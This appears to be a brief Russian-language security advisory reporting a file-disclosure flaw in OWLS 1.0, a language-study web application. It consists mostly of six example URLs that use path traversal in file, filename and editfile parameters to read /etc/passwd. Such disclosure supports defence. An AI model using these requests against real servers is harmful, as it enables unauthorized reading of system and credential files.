Программа: Owl Workshop for Language Study (OWLS) 1.0 

Уязвимость обнаружена в Owl's Workshop for Language Study (OWLS). Удаленный пользователь может просматривать произвольные файлы на целевой системе. 

Пример: 

http://[target]/owls/ glossaries/index.php?file=/etc/passwd

http://[target]/owls/ multiplechoice/index.php?file=
../../../../../../../../../../../../../.. /../etc/passwd&view=print

http://[target]/owls/readings/ index.php?filename=/etc/passwd

http://[target]/owls/multiplechoice/ resultsignore.php?filename=/etc/passwd

http://[target]/owls/workshop/ glossary.php?editfile=../../../../../../../../../../
../../../../. ./etc/passwd

http://[target]/owls/workshop/ newmultiplechoice.php?edit=1&editfile=
../../../../../../../../../../../ ../../../../etc/passwd

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии